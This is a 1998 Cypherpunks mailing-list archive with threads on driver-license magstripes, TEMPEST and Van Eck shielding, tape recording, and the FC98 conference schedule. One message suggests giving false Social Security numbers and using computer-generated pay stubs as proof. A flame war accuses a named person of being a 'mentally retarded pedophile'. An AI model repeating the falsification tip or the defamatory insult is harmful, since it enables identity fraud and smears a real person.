to doubt that (and it isn't just the Republicans voting for corporate
welfare socialism, Democrats do it too).
JMR

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh.

iQEPAwUBNODjfjUhsGSn1j2pAQFziQfQ4ZrEuBdROssccGRGZHvhLUsCBhlz3j/1
PD0bcZXD8xvHiprG8jsCQV1nduKE3FNA8odhtbRUwtYF5dUxS5aSscnb/wuQXcda
FaSs6UhRmnwwech38zh7fK0qeC56rstpDdAKy5aoBso4lSLGOu/vyCEhU78zw/NW
2hxm5w9wHapJ4LyU7NwpGrCZWpKHREJKoPnme77roU+AiAVmM44TnZmVNRjbb0lL
+rEwXeSckj+d8qF+qdv/l0WUhg3jBMRXBwlBYOejEjNpwLkeGlWo70zLsSq/ihPc
9c9qbb/q2582mwmnl7rI/jo4q4RbVhsQdRCZ8UVdBACghg==
=EyXh
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Uhh...this is Joe [Randall Farmer]" <rfarmer@HiWAAY.net>
Date: Wed, 11 Feb 1998 13:16:56 +0800
Subject: re: Driver Licenses
Message-ID: <Pine.OSF.3.96.980209175340.21170B-100000@fly.HiWAAY.net>
MIME-Version: 1.0
Content-Type: text/plain



> 
> Either should work...I'll bet that scratching the shit off with his keys
> worked too ;)
> I'll have to remember that when it's time to get mine done.

Shouldn't take much if all you need is to stop regular folks from scanning 
it -- if it's like some other systems, changing a couple bits will keep the
checksum from checking and the reader will report the card as invalid. 

> 
> That was a good question, though, does anyone know how much data those
> little stripes can hold?

It can (emphasis on can; most stripes don't) store 300 bytes according to 
some -- 1846 characters of English in theory, 600 in practice, 480 uncompressed,
300 ASCII. 300 bytes is six monochrome compressed mugshots or a 2400-pixel
(about 50x50) uncompressed monochrome photo, or it could hold 33 military-grade
biometric IDs. A study of el33t h@qu3r ph1|ez show that actual credit and ATM
cards don't use nearly 300 bytes. That might be because error rates would be
astronomical, or it might just be because they can't use all the extra space. 

[After writing this, I saw another web site with a figure of 226 bytes, not
300. Don't know who's right, so I'm going with the paranoid estimate...]

> 
> Scott R. Brower
> http://www.infowar.com
> http://www.efflorida.org

---------------------------------------------------------------------------
Randall Farmer
    rfarmer@hiwaay.net
    http://hiwaay.net/~rfarmer














From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 11 Feb 1998 08:21:01 +0800
To: "CypherPunks List" <meander-talk@abacus96.com>
Subject: Re: Fwd: Social Security
In-Reply-To: <199802102151.QAA31482@mx02.together.net>
Message-ID: <3.0.2.32.19980210191727.035ea8a8@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



At 04:51 PM 2/10/98 -0500, Brian B. Riley wrote:
>
>---------------- Begin Forwarded Message ----------------
>Date:        02/09  10:25 PM
>Received:    02/09  10:29 PM
>From:        James A Chappelow, chappja@mail.auburn.edu
>Reply-To:    Vermont Libertarian, vtlp-list@catamount.com
>To:          Multiple recipients of, vtlp-list@catamount.com
>
>Outside of Birmingham, a kid was arrested Saturday for not giving a cop
>his Social Security number. The bumper fell off his truck, so he stuck the
>tag in the rear window; not a rare sight in Alabama. 


Luckily, even though many states demand SS#s, they tend not to verify SS#s so you can supply whatever you like.  One state (Ohio) demanded some proof of SS# and was satisfied by a payroll check stub which can be generated by any computer.

Common identifiers are meaningless if not verified.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 11 Feb 1998 08:27:55 +0800
To: e$@vmeng.com, fc98@offshore.com.ai
Subject: FC'98 Palm Pilot Resources
Message-ID: <3.0.2.32.19980210192156.036d3da0@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



I have produced some FC'98 files in suitable formats for the Palm Pilot.  I will be adding more as the date approaches.

http://www.frissell.com/AXA/axa.html

So far we have:

A map of Anguilla (looks great in Image).

A map of Monserrat with eclipse lines. 

and in DOC format:
 
The Wired article on FC'97.

The Forbes cover story on FC'97.

and finally:

For purposes of amusement only, a Jfile databse of the first 4 quarterly reports of the (1786) names of Taxpatriates (those with too much money who renounce their US citizenship) as reported to the Secretary of the Treasury last year by the State Department.
 
More to come including a schedule in .dba format as soon as The Powers That Be settle on one.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelsonde@umich.edu
Date: Wed, 11 Feb 1998 08:41:44 +0800
Subject: No Subject
Message-ID: <199802110031.TAA13619@seawolf.rs.itd.umich.edu>
MIME-Version: 1.0
Content-Type: text



 I'm Snyder, the karmic metacrawler.  The word:
           cryptanalytic
 and Alta Vista's Scooter lead me to you.  Know that in
 the frigid wastes of the WWW my PERL-scripted heart beats for you.


To:  cypherpunks\@toad.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 11 Feb 1998 09:20:34 +0800
To: cypherpunks@toad.com
Subject: Re: Cyber 'Nannys"
In-Reply-To: <v03102800b106398ae3b8@[207.167.93.63]>
Message-ID: <qsoPke10w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



Tim May <tcmay@got.net> writes:

> As far as I'm concerned, absent a contract, anyone who "demands" something
> from me is on thin ice.
>
> Like I said, if you're unhappy that CyberSitter or NetNanny will not
> provide you with information you wish to have, use another service.

So I can't demand that the censorware peddlers not mailbomb me?

The mentally retarded pedophile Guy Polis tried to mailbomb me from his
former eviljay@bway.net account, and bway.net pulled his plug in minute.

Is that censorship?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <rdl@mit.edu>
Date: Wed, 11 Feb 1998 09:22:21 +0800
To: cypherpunks@Algebra.COM
Subject: TEMPEST open-source definition version 0.1alpha
Message-ID: <199802110119.UAA04666@the-great-machine.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----


So, if we're going to try to protect computers from TEMPEST threats, and we
don't have access to the multiple government classified standards, we should
come up with the Cypherpunks TEMPEST standard.

A theoretical definition of what we want to do (strong) is that we should be
able to put the equipment in a virtual box, have an empty virtual box,
and then nothing anything which is not in the TCB can do can distinguish
one box from the other.  Perhaps the "empty" box should also contain
simulators for the ethernet, visible light output, and straight power
draw (harmonics are still to be avoided), or in some other definitional
way they should be accounted for.  This prevents non-TCB programs from
utilizing the EM spectrum as a covert channel.

Additionally, we need to protect the user from divulging state information
about his TCB.  I guess this condition can best be met by simply saying
"take the target system and clone its state perfectly.  Separate the two
systems.  Allow the user to modify the state of the target system while you
retain the clone -- you do not have a non-negiligible improvement in
matching future state using the EM emissions of the first system over
not using the EM emissions."  I think there is a better way of stating
this, though.

So, given a workable theoretical definition which defines perfection, it's
time to reverse engineer the practical TEMPEST systems (and in so doing
perhaps the classified TEMPEST spec) out there.  Next time I find a
TEMPEST case at swapfest, or at a con, I'll pick it up (if someone wants to
ship me one, so much the better).  You *can* buy them from some vendors,
although they often refuse to sell them to non-government affiliated entities).
MIT's quasi-affiliated Draper Labs has proper TEMPEST verification equipment,
and I think some places on MIT's campus have some general purpose equipment
which can be used for such purposes.  If not, I have a copy of NI LabView
and some DAQ hardware which, coupled with some antenna frobbery, can be
used to do a quick spectrum analyzer, and there's the capacity to do
some serious analysis once the data are on the computer.

It would be nice to know how good government TEMPEST systems really are.
In practice, matching them would probably be enough.  The above theoretical
definition doesn't really help that much -- in practice, there's going to be
some information coming out, and just because you can't figure out how to use
it, doesn't mean no one can.  I think preventing the covert channel attack
might actually go beyond the government's TEMPEST spec -- certainly if a
non-TCB program can cause a system reboot, or power up a peripheral, you
can detect the change in power draw, unless the system naturally throws away
the difference between its max power consumption and its present power 
consumption all the time.  Being able to telegraph even 1 bit of information
might be enough, and if you've got an arbitrary precision clock, you could
use this method to send an arbitrary codeword from an arbitrary-length 
codebook given an arbitrary time interval.

The rainbow books talked about covert channel elimination being a really
hard problem.  Now I see even more why they were right.  IIRC, it's only
at the not-really-commercially-available levels (A1) that covert channels
are utterly eliminated; usually they are comfortable just documenting them.

Of course, it would probably make a lot of sense to do TEMPEST reverse 
engineering in a country that has neither an OSA nor the ability to randomly
classify research.  Yet another project for cypherpunks.to, Lucky?

A practical way of approaching theoretical TEMPEST-perfection is just
a decent faraday cage with a lead-glass monitor cover, shielded or
eliminated cables, and a serious double-conversion UPS.  From the government
TEMPEST products I've seen, that's all they are (or they use mesh).  I've
mainly seen thinks like the SafeKeyper, not general purpose computers, though.
I don't think Jim was that far off the mark in thinking class B machines
are a worthwhile starting point, but it doesn't go anywhere near far enough.

ObCrypto: I've been looking at implementing a cipher in a reconfigurable
processor.  I might even customize one.  Yay.

ObGuns: I got to use a .22cal nail gun.  It was fun.

ObPersonalAttacks: There are a lot of people who are not Real US Citizens
on this list.  Beware the evil multinationalist conspiacy in our midst, good
followers of Bill Clinton!

ObQuestion: Can the US government deny a passport for no reason to a random
US citizen who is not a felon?
- -- 
Ryan Lackey
rdl@mit.edu
http://mit.edu/rdl/		



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBNOD8sawefxtEUY69AQG3NQf9GWJjz3pwORa4y5V1YQA/BBAebDJNlnhd
gauYxwALwsEIID20Da3x7f/ZZ/ipVH1fhk9SJYGgPK+mtc7HMpPA7WhEfR1awuyE
FaP6VrJ18vKy6Cf+JlUbag2w5luQfSlo4o1jK0v6Os3D+PpuDyRN3GUI05dTxKyC
+VfS8oiw+SaM455l1knHGnegLZzivCKGS/xXDFD71dl5QCRQsAMBaGrjg0pej8gJ
ByiO4X7ae8OdlUytdQpfaNOtJTdSQJ7C3FLjczp9dQKvb7msfQUWzAWG9L8XneUP
b6xRF5Ra1JaixfFEJisnP+CfZbtJknvNlffUh+//b17ql8Jz5WsFJg==
=IRsn
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Wed, 11 Feb 1998 09:56:59 +0800
To: cypherpunks@toad.com
Subject: Re: Cyber 'Nannys"
Message-ID: <199802110145.UAA07873@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



   >   To: cypherpunks@toad.com
   >   Subject: Re: Cyber 'Nannys"
   >   From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
   >   Message-Id: <qsoPke10w165w@bwalk.dm.com>
   >   
   >   The mentally retarded pedophile Guy Polis tried to mailbomb me from his
           ^^^^^^^^ ^^^^^^^^ ^^^^^^^^^ ^^^
   >   former eviljay@bway.net account, and bway.net pulled his plug in minute.

Fire One.

---guy





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian B. Riley" <brianbr@together.net>
Date: Wed, 11 Feb 1998 10:33:12 +0800
To: "Ryan Lackey" <cypherpunks@Algebra.COM>
Subject: Re: TEMPEST open-source definition version 0.1alpha
Message-ID: <199802110228.VAA11735@mx02.together.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

On 2/10/98 8:19 PM, Ryan Lackey (rdl@mit.edu)  passed this wisdom:

>So, if we're going to try to protect computers from TEMPEST 
>threats, and wedon't have access to the multiple government 
>classified standards, we should come up with the Cypherpunks 
>TEMPEST standard.
>
>A theoretical definition of what we want to do (strong) is that we 
>should beable to put the equipment in a virtual box, have an empty 
>virtual box, and then nothing anything which is not in the TCB can 
>do can distinguish one box from the other. Perhaps the "empty" box 
>should also contain simulators for the ethernet, visible light 
>output, and straight power draw (harmonics are still to be 
>avoided), or in some other definitional way they should be 
>accounted for. This prevents non-TCB programs from utilizing the EM 
>spectrum as a covert channel.  
  [big snip]

 Some of this reminds me of when I worked at Raytheon, I did some coding
for this genius at magnetic fields we had. This was the time of the MX
missile and the 'racetrack' concept, mobile launchers that moved all the
time. The idea was that a significiant percentage of the mobile launch
cannisters were empty and what the scientist I worked with had to do was
design a set of coils for the dummy cannister that would make it have
the same magnetic signature as a real cannister loaded with a real
missile ... "sort of a global thermonuclear shell game" if you will ...

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQEVAwUBNOEM0D7r4fUXwraZAQG+hQf/U/2Irt9FlQQWxc1nJQ1wlFUEtMf5fAxB
5JUXDwGy7+rAVojReAj9gV9SeXZA+h25WJMIbzngibSOYfieiE0iXPNbgNVsDLm/
/giLgqW/AfBUm+EjQMP5glav4xQxGDTKdBBGSqujyzkn5jaDlBVff5mfw5oUeN1c
Vz4dIOzl8n6ivdc2PRbFh+he1X55+y3wLAqYc60VMmhlWPTTHx4PoJRw6hl5lX9c
dfxTIo5B1Gw1I7pP0REFTodW+HXASqoXAG/1Xo3J5rn+yup0IQblz9Pg8IBAW22j
kuFECDHuo9daXp7QH0nZX1/2hRw/cZUf8AtGMhDq3zNWH21E2pHsQA==
=+Gr+
-----END PGP SIGNATURE-----


Brian B. Riley --> http://members.macconnect.com/~brianbr
 For PGP Keys  <mailto:brianbr@together.net?subject=Get%20PGP%20Key>

  -- give us the rights Abraham Lincoln cherished lovingly:
     "Those who deny freedom to others deserve it not for themselves."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 11 Feb 1998 11:48:11 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Drivers licenses (fwd)
Message-ID: <199802110351.VAA08010@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 10 Feb 1998 21:27:57 -0500
> From: David Miller <dm0@avana.net>
> Subject: Re: Drivers licenses

> > > It's a signal that is mixed and laid down by the machine. It covers the
> > entire track. The cassette head only has two or four head depending on if
> > it has auto-revers and moves the head.
> 
> So you are saying that the is a continuous track of varying amplitiude
> that
> defines the audio signal?  And that your bias is a part of this?

Actualy a standard cassette tape has 4 tracks grouped in pairs. Each pair is
given one of the channel. The audio that comes in is mixed with a bias
signal (using a summing amp) and then laid down on the tape.

> >From what I know, the bias is a parameter to the recording process and
> not
> the recording as it can be recovered from the magnets.  It is something
> intended to forward-correct error, which is not intended to be
> interpreted
> in the future.

Huh? I have been involved in audio recording for over 20 years, acted as
rodies for a host of bands (some of which actualy made records - but alas no
money) and I must admit that the above sentences don't make any sense to me
at all. Can you possible reword them?

What magnets? 'paramter of the recording process'? 'forward-correct error'?
'interpreted in the future'?

If your heads are magnetised you really should de-gauss them. They'll erase
your tapes eventualy...

> Looking for satellites?

No, to do that I use a C-band hooked to a alt-az mount and a digital modem.
I'll probably just make a normal Newtonian and hood a CCD camera to it and
feed my Video Toaster to digitize and enhance the images. I am particular
inchanged by the Moon. I can look at it for extended periods. I was
enchanted by it when Men stepped onto it for the first time. I very much
hope that we (as a race) go back to stay...

> Did you snag a job?  I had a headhunter call tonight.  It's been a year
> or
> so since they've bothered me.

I talked to BMC Software today. Looks like I'll probably go to work for them
supporting their suite of database products. I should know tomorrow if they
want to do the final interview which means I'll go to work for them on
Monday.

> >    |                   The obvious is sometimes false;                  |
> >    |                   The unexpected sometimes true.                   |
> 
> You've gotta get this Pringles thing in order.  Faith breaks the back of
> these
> types of philosophies.  If you give in to faith, you should normally
> incorporate
> it.  That doesn't mean that you have to explain it through the
> philosophy, but
> if that faith is the only thing that you know is indespensable, you need
> to
> reconsider how indespensable a philosophy that does not make room for it
> is.

Uh, ok.

Ta ta.


    ____________________________________________________________________
   |                                                                    |
   |                   The obvious is sometimes false;                  |
   |                   The unexpected sometimes true.                   |
   |                                                                    |
   |                                       Anonymous                    |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 11 Feb 1998 12:37:17 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: TEMPEST open-source definition version 0.1alpha (fwd)
Message-ID: <199802110356.VAA08108@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: TEMPEST open-source definition version 0.1alpha
> Date: Tue, 10 Feb 1998 20:19:46 EST
> From: Ryan Lackey <rdl@MIT.EDU>

> time to reverse engineer the practical TEMPEST systems (and in so doing
> perhaps the classified TEMPEST spec) out there.  Next time I find a
> TEMPEST case at swapfest, or at a con, I'll pick it up (if someone wants to
> ship me one, so much the better).  You *can* buy them from some vendors,

Are you possibly confusing Tempest with a NEMA certified case? Educalc used
to sell a case for the HP-41C calculator that they touted as NBC certified.

I would suggest looking for one of the NIST certified environmental test
cases that are available. They'll cook or chill your electronics and block
the emissions quite handily. Be shure to get a supply for the copper door
gaskets, they wear out under daily use about 3-4 times a year.


    ____________________________________________________________________
   |                                                                    |
   |                   The obvious is sometimes false;                  |
   |                   The unexpected sometimes true.                   |
   |                                                                    |
   |                                       Anonymous                    |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Wed, 11 Feb 1998 14:24:54 +0800
To: Jim Choate <cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: VanEck, Noise, & Palmtops...
In-Reply-To: <199802101949.NAA05309@einstein.ssz.com>
Message-ID: <v03110714b106f04e2ede@[207.94.250.77]>
MIME-Version: 1.0
Content-Type: text/plain



At 11:49 AM -0800 2/10/98, Jim Choate wrote:
>If you want to defeat Van Eck you want either very quite or you want lots of
>noise smoothly distributed across the rf spectrum.

To defeat the integrating attacks you have described, you want to repeat
the same noise frame after frame.  It must be loud enough to swamp the
signal going to the display, so the output of the integration is the noise
and not the signal.


-------------------------------------------------------------------------
Bill Frantz       | Market research shows the  | Periwinkle -- Consulting
(408)356-8506     | average customer has one   | 16345 Englewood Ave.
frantz@netcom.com | teat and one testicle.     | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Miller <dm0@avana.net>
Date: Wed, 11 Feb 1998 11:34:20 +0800
To: cypherpunks@Algebra.COM
Subject: Re: How to profit from writing open source (was: free software)
Message-ID: <34E11B59.4E013B83@avana.net>
MIME-Version: 1.0
Content-Type: text/plain



A while back there was a thread on different models of
how to profit from free software.  I have a few
additions that I don't think were mentioned, albeit late.
Ok.  Way late.

The Data Fellows model - supply (ssh) Unix source code
        free, but charge for Windows (clients) after a
        30-day trial period.  Yes.

The Joel McNamara model - give the (Private Idaho)
        software away and go fight forest fires and
        have your children profit from a better world.

--David Miller

middle  rival
devil rim lad





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eviljay <eviljay@bway.net>
Date: Wed, 11 Feb 1998 11:58:53 +0800
To: cypherpunks@toad.com
Subject: Re: Cyber 'Nannys"
Message-ID: <199802110346.WAA25404@nico.bway.net>
MIME-Version: 1.0
Content-Type: text/plain



>   Dr. Dimento wrote:
>   
>   The mentally retarded pedophile Guy Polis tried to mailbomb me from his
>   former eviljay@bway.net account, and bway.net pulled his plug in minute.
>    
>   ---
>    
>   Dr. Dimento KOTM
>   Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

Everybody SING!!!

   The old grey crank,
   he ain't what he used to be,
      ain't what he used to be,
      ain't what he used to be.

   The old grey crank,
   he ain't what he used to be,
   and it'll be like that forevermore.


>   Is that censorship?

Is sex with the impotent Dr. Dimento intercourse?
-->EvilJay<--

   MUH-HAHAHAHAHAHAHAHAHAHAHAAHA!!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 11 Feb 1998 12:00:34 +0800
To: cypherpunks@cyberpass.net
Subject: FC98 Full Event Schedule
Message-ID: <v04003a1eb106ccbdee68@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Resent-Date: Tue, 10 Feb 1998 18:19:23 -0400
X-Authentication-Warning: online.offshore.com.ai: list set sender to
fc98-request@offshore.com.ai using -f
X-Sender: rah@pop.sneaker.net
Mime-Version: 1.0
Date: Tue, 10 Feb 1998 16:58:52 -0500
To: fc98@offshore.com.ai
From: Robert Hettinga <rah@shipwright.com>
Subject: FC98 Full Event Schedule
Resent-From: fc98@offshore.com.ai
X-Mailing-List: <fc98@offshore.com.ai> archive/latest
X-Loop: fc98@offshore.com.ai
Precedence: list
Resent-Sender: fc98-request@offshore.com.ai

Hello, Everyone!

FC98 is fast approaching, and the FC98 organizing team is thrashing
together a General Schedule for the combined FC98 events: The FC98
Conference, the FC98 Commercial Exhibition and Exhibition Program, and the
FC98 Workshop.

In addition to the ASCII version of the schedule in this message, Blanc
Weber, the FC98 Exhibition and Sponsorship Manager, has put a very nice
tabular version on the web for easy printing:
<http://www.cnw.com/~blancw/FC98Sched/FC98Schd.html>

Please send any corrections you might have to me offline.


Okay, here's the schedule's roadmap:

(CON) means conference activity, and an FC98 Conference Badge is required
for attendance.

(CE) means Commercial Exhibition activity, and is open to the public.

(ECC) means Ecliptical Curve Cruise; Conference badgeholders go free, but
badges are non-transferrable. Additional tickets for the Cruise are
available for sale to FC98-associated people (family, friends, etc.).

(IFCA) means the founding meeting of the International Financial
Cryptography Association, which all FC98 Conference badgeholders,
booth-holders and sponsors are now automatically members of. Only
Conference badgeholders can vote at the first General Meeting of the
Association, however.

We don't have anything about the Workshop on this message, but we will have
a schedule for it soon on the web page, for those of you who are interested
in sticking around another week for the world's only financial cryptography
bootcamp. :-).


Also, all FC98 badgeholders, friends, and family are invited to the
"Welcome to Anguilla" session on Monday to get some information and advice
on what to do during your stay on Anguilla.


Finally, like all schedules, this one is subject to change at a moment's
notice. ;-). We'll try to keep the website as up-to-date as possible,
because it's probably a good idea not to spam you nice folks will all the
updates as they happen. :-)

See you in Anguilla!

Cheers,
Robert Hettinga,
General Chairman,
The 1998 Financial Cryptography Conference, Exhibition and Workshop (FC98)


-----


Monday 23 February 1998

 800 --  820 (CON)
    Breakfast

 820 --  830 (CON)
    FC98 Conference Sessions Welcome

 830 --  905 (CON)
    Micropayments via Efficient Coin-Flipping
    Richard J. Lipton (Princeton University, Princeton, NJ, USA)
    Rafail Ostrovsky (Bellcore, Morristown, NJ, USA)

 905 --  940 (CON)
    X-Cash: Executable Digital Cash
    Markus Jakobsson (Bell Laboratories, Murray Hill, NJ, USA)
    Ari Juels (RSA Laboratories, Bedford, MA, USA)

 940 -- 1015 (CON)
    Distributed Trustees and Revokability:
      A Framework for Internet Payment
    David M'Raihi (Gemplus, Issy-les-moulineaux, France)
    David Pointcheval (GREYC, Universite de Caen, Caen, France)

1015 -- 1045 (CON)
    Coffee Break
    Exhibition Booths open

1045 -- 1120 (CON)
    A Platform for Privately Defined Currencies, Loyalty Credits,
      and Play Money
    David P. Maher (AT&T Labs--Research, Florham Park, NJ, USA)

1120 -- 1155 (CON)
    Assessment of Threats for Smart Card Based Electronic Cash
    Kazuo J. Ezawa, Gregory Napiorkowski
        (Mondex International, Florham Park, NJ, USA)

1155 -- 1230 (CON)
    Using a High-Performance, Programmable Secure Coprocessor
    Sean W. Smith, Elaine R. Palmer, Steve Weingart
        (IBM T.J. Watson Research Center, Yorktown Heights, NY, USA)

1230 -- 1330 (CON)
    Lunch

1330 -- 1400 (CE)
    The Required Hoopla: FC98 Official Event Opening
    Dignitaries (the Finance Minister?), FC98 sponsors, FC98 Management, etc.
    Thanks to Anguilla, Sponsors, etc.
    Administrivia/How FC98 works
    Ribbon Cutting for FC98 Exhibition
    FC98 Exhibition Sessions Welcome

1400--1430 (CE)
    FC98 Press Conference (on Exhibition Floor)

1400--1500 (CE)
    IBM Secure Crypto Coprocessor Demonstration
    Sean W. Smith, Elaine R. Palmer, Steve Weingart
        (IBM T.J. Watson Research Center)

1500--1600 (CE) (Bring friends and family if you want)
    Welcome to Anguilla! Anguilla history, what to do, what to see.
    Various Anguillan Chamber of Commerce, Tourist office folks.

1600--1700 (CE)
    "So, you want to bank on Anguilla?" Offshore Banking and
     Incorporation in Anguilla. Various Anguillan Bankers,
     Lawyers, Financial Planners, Etc.

1830 -- 2000 (CE)
    Cocktail Reception at Serenity Restaurant, Shoal Bay East
    Sponsored by Hansa Bank, Anguilla


Tuesday 24 February 1998

 800 --  830 (CON)
    Breakfast

 830 --  905 (CON)
    Secure Group Barter:
      Multi-Party Fair Exchange with Semi-Trusted Neutral Parties
    Matt Franklin (AT&T Labs--Research, Florham Park, NJ, USA)
    Gene Tsudik (USC Information Sciences Institute, Marina del Rey, CA, USA)

 905 --  940 (CON)
    A Payment Scheme Using Vouchers
    Ernest Foo, Colin Boyd
        (Queensland University of Technology, Brisbane, Australia)

 940 -- 1015 (CON)
    A Formal Specification of Requirements for Payment Transactions
      in the SET Protocol
    Catherine Meadows, Paul Syverson
        (Naval Research Laboratory, Washington, DC, USA)

1015 -- 1045 (CON)
    Coffee Break

1045 -- 1120 (CON)
    On Assurance Structures for WWW Commerce
    Markus Jakobsson (Bell Laboratories, Murray Hill, NJ, USA)
    Moti Yung (CertCo, New York, NY, USA)

1120 -- 1230 (CON)
    Panel Discussion
    Certificate Revocation: Mechanics and Meaning
    Barb Fox (Microsoft, Redmond, WA, USA), moderator
    Joan Feigenbaum (AT&T Labs--Research, Florham Park, NJ, USA)
    Paul Kocher (Valicert, Palo Alto, CA, USA)
    Michael Myers (Verisign, Mountain View, CA, USA)
    Ron Rivest (MIT Laboratory for Computer Science, Cambridge, MA, USA)

1230 -- 1330 (CON)
    Lunch



1330 -- 1430 (CE)
    FC98 Sponsor Showcase
    RSA Data Security

1430 -- 1530 (CE)
    FC98 Sponsor Showcase
    C2NET

1530 -- 1630 (CE)
    FC98 Sponsor Showcase
    Sicherheit und Privat- International Bank

1630 -- 1730 (CE)
    FC98 Sponsor Showcase
    Hansa Bank


1730 -- 1900 (CE)
    Cocktails and Barbecue at InterIsland Hotel
    Sponsored by RSA

1900 -- 2000 (IFCA) (CE) (CON to vote)
    General Meeting:
    The International Financial Cryptography Association (IFCA)
    IFCA Founders Group Photo (Net.Nyms Disguised)

2000 -- 2200 (CON to speak) (CE to watch )
    Rump Session
    (For speaking requests contact
     Matt Franklin <mailto: franklin@research.att.com>)
    Beer provided by RSA




Wednesday 25 February 1998

 800 --  830 (CON)
    Breakfast

 830 --  930 (CON)
    Invited Speaker
    Private Signatures and E-commerce
    David Chaum (DigiCash, Palo Alto, CA, USA)

 930 -- 1005 (CON)
    Group Blind Digital Signatures:
      A Scalable Solution to Electronic Cash
    Anna Lysyanskaya, Zulfikar Ramzan
        (MIT Laboratory for Computer Science, Cambridge, MA, USA)

1005 -- 1045 (CON)
    Coffee Break

1045 -- 1120 (CON)
    Curbing Junk E-Mail via Secure Classification
    Eran Gabber, Markus Jakobsson, Yossi Matias, Alain Mayer
        (Bell Laboratories, Murray Hill, NJ, USA)

1120 -- 1155 (CON)
    Publicly Verifiable Lotteries:
      Applications of Delaying Functions
    David M. Goldschlag (Divx, Herndon, VA, USA)
    Stuart G. Stubblebine (AT&T Labs--Research, Florham Park, NJ, USA)

1155 -- 1230 (CON)
    Security of Digital Watermarks
    Lesley R. Matheson, Stephen G. Mitchell, Talal G. Shamoon,
      Robert E. Tarjan, Francis X. Zane
        (STAR Lab, InterTrust Technologies, Sunnyvale, CA, USA)

1230 -- 1330 (CON)
    Lunch

1330 -- 1405 (CON)
    Security in the Java Electronic Commerce Framework
    Surya Koneru, Ted Goldstein
        (JavaSoft, Palo Alto, CA, USA)

1405 -- 1440 (CON)
    Beyond Identity: Warranty-Based Digital Signature Transactions
    Yair Frankel (CertCo, New York, NY, USA)
    David W. Kravitz (Divx, Herndon, Virginia, USA)
    Charles T. Montgomery (CertCo, New York, NY, USA)
    Moti Yung (CertCo, New York, NY, USA)

1440 -- 1515 (CON)
    Compliance Checking in the PolicyMaker Trust Management System
    Matt Blaze, Joan Feigenbaum, Martin Strauss
        (AT&T Labs--Research, Florham Park, NJ, USA)

1515 -- 1545 (CON)
    Coffee Break

1545 -- 1620 (CON)
    An Efficient Fair Off-Line Electronic Cash System
      with Extensions to Checks and Wallets with Observers
    Aymeric de Solages, Jacque Traore
        (France Telecom--CNET, Caen, France)

1620 -- 1655 (CON)
    An Efficient Untraceable Electronic Money System Based on
      Partially Blind Signatures of the Discrete Logarithm Problem
    Shingo Miyazaki, Kouichi Sakurai
        (Kyushu University, Fukuoka, Japan)

1655 -- 1700 (CON)
    FC98 Conference Session Closing
    Official Conference T-shirts
    Group Photo (Net.Nyms Disguised)


1830 -- 2100? (CE)
    Financial Masquerade Ball (at Cap Julaca)
    Sponsored by Sicherheit und Privat- International Bank
    (Proper attire and disguises required,
    Groucho glasses available at the door).
    RSVP

Thursday 26 February 1998

Beach/Cruise day.
No FC98 activity scheduled today
 except breakfast and lunch at InterIsland
 for those who don't take the eclipse cruise.

 800 --  830 (ECC) (CON)
